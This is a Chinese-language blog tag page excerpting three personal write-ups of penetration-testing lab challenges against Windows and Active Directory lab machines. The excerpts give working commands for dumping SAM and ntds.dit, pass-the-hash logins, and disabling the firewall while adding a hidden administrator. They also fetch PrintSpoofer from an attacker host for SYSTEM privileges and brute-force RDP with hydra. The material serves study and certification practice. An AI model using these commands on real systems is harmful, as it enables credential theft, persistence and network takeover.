發表文章

目前顯示的是有「robocopy」標籤的文章

Challenge 8 - Poseidon(1)

圖片
 Challenge 8 - Poseidon(1) 檢視 jackie 的權限,whoami /priv 發現有 SeBackupPrivilege 導出 sam & system reg save hklm\sam c:\users\jackie\Documents\sam reg save hklm\system c:\users\jackie\Documents\system └─$ impacket-secretsdump -sam ./sam -system ./system LOCAL Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fea81a19d172de0c445c8072b9a1697:::  使用 impacket-psexec,└─$ impacket-psexec -hashes :8fea81a19d172de0c445c8072b9a1697 administrator@192.168.163.162 evil-winrm,└─$ evil-winrm -i 192.168.163.162 -u Administrator -H 8fea81a19d172de0c445c8072b9a1697 都無法登入 看來要改 COPY ntds.dit 檔案,使用 robocopy 進行複製出現執行中無法複製 參考這一篇 :  https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/ 編輯一個 raj.dsh 檔案如下 set context persistent nowriters add volume c: alias raj create expose %raj% z: 編輯完畢後使用 unix2dos 進行轉換,└─$ unix2dos raj.dsh  建立一個 c:\Temp 資料夾,上傳 raj.dsh 檔案然後執行 diskshadow /s raj.dsh 再複製一次 ntds.dit,使用指令  robocopy /b z:\windows\ntds . ntds. dit 成功複製出來了 依樣抓回 ka...

Challenge 7 - Zeus(1)

圖片
 Challenge 7 - Zeus(1) 先用 impacket-psexec 進入 .160,└─$ impacket-psexec -hashes :97db5c87465431b9091d47a58fe76483 administrator@192.168.182.160 開啟 RDP,關閉 Firewall reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall set allprofiles state off 新增一組憑證 aries:Oscp#1234 然後加入本機的 administrators 管理者群組 net user aries Oscp#1234 /add net localgroup administrators aries /add 在使用者 z.thomas 的 Download 資料夾中有一個名稱為 "Onboarding Document" 的檔案 看來是報到文件,各一個 *.docx 的 Word 檔案,內容看來是使用者的預設密碼 z.thomas: ^1+>pdRLwyct]j,CYmyi 立馬 crackmapexec 測試看看,└─$ crackmapexec smb 192.168.182.158-160 -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi' -d zeus.corp  看來是有效的憑證 跑一下遠端 BloodHound 查看一下有無更新,└─$ bloodhound-python -d zeus.corp -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi' -gc dc01.zeus.corp -c all -ns 192.168.182.158 看來 z.thomas 屬於 Remote Management 群組成員 立馬 crackmapexec 測試一下 winrm,發現可以進 DC01 .158 e...

Windows 漏洞利用

圖片
 Windows 漏洞利用 練習 1 靶機 IP 192.168.240.220,使用 PrintSpoofer 取得程式碼執行並提權,或取 daveadmin 桌面的 flag 該機器 4444 Port 已經有個一般使用者的 Remote Shell 第一步 nc 4444 到靶機然後 whoami /priv 查一下此 Shell 的使用者權限 馬上看到 SeImpersonatePrivilege 的狀態是 Enable,那就妥了 題目寫要利用 PrintSpoofer ,所以直接去下載一個該工具的 64 版本 wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe 然後透過 iwr GET 載入到靶機 iwr -uri http://192.168.45.214/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe 要使用 PrintSpoofer64.exe 在 NT AUTHORITY\SYSTEM 上下文中取得互動式 PowerShell Session,我們使用參數 -c 來指定我們要執行的命令 powershell.exe,並透過參數 -i 來與當前進程進行交互命令提示符。 指令 : .\PrintSpoofer64.exe -i -c powershell.exe 原本是 dave,執行完後 whoami 變成 nt authority\system 可以拿 flag 了 練習 2 靶機 IP 192.168.240.222,提權並獲取 enterpriseadmin 桌面的 flag 該機器 4444 Port 已經有個一般使用者的 Remote Shell nc 後查看權限,有 Enable 的是 SeChangeNotifyPrivilege,暫時沒戲 接著在 Documents 底下發現很多文件檔,note2.txt 有寫預設密碼是 WelcomeToWinter0121 那就 net user 一下建立使用者帳號檔案 w32user.txt 然後 hydra RDP 破破看 hydra -L /home/kali/w...